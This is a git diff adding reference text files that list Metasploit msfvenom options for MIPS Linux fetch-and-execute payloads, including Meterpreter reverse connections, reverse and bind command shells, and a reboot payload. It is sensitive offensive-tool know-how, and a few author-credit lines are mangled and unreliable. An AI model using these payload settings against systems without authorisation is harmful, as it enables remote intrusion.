Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7f3bdff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uduPCcLgXJQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..e5e7cea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VsloLaaJECI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt new file mode 100644 index 0000000..2dd85ac --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-reboot.txt @@ -0,0 +1,74 @@ + + Name: HTTPS Fetch, Linux Reboot + Module: payload/cmd/linux/https/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MNZWdrUwKrc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..8a6b61f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell-reverse_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sUxQlkTkc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..47767fe --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_bind_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sjloBsPw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..3f4cf39 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-shell_reverse_tcp.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NsAXOzpGajXa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt new file mode 100644 index 0000000..3009d3f --- /dev/null 